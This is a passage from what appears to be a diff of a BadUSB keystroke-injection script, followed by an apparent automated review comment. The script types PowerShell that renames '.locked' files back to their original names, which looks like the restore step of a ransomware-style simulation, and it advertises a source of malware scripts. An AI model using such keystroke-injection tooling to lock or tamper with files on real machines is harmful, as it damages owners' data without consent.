3000 +REM Iterate over each location +STRING foreach ($folder in $folders) { +DELAY 1000 +ENTER +DELAY 1000 +STRING $path = [Environment]::GetFolderPath($folder) +DELAY 1000 +ENTER +DELAY 4000 +REM Get all .locked files in the path and rename them back +STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace 
'\.locked$', '') } +DELAY 2000 +ENTER +DELAY 5000 +STRING } +DELAY 1000 +ENTER +DELAY 4000 +STRING exit +DELAY 1000 +ENTER +REM Check out github.com/MarkCyber for more badusb scripts, malware and pen testing stuff
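Review bot: The restore line gives the operator no way to confirm that every file came back: if a file with the original name has been recreated since the simulation ran, `Rename-Item` fails for that entry and the `.locked` copy stays behind. The error appears only in a console that is closed by `exit` a few seconds later. Inside the loop, after the rename, list what is left, e.g. `Get-ChildItem -Path $path -File -Filter *.locked`, and lengthen the final delay or write that list to a file so it can be read. The header line "This can be ran multiple times if necessary" would be clearer if it said when a rerun is needed.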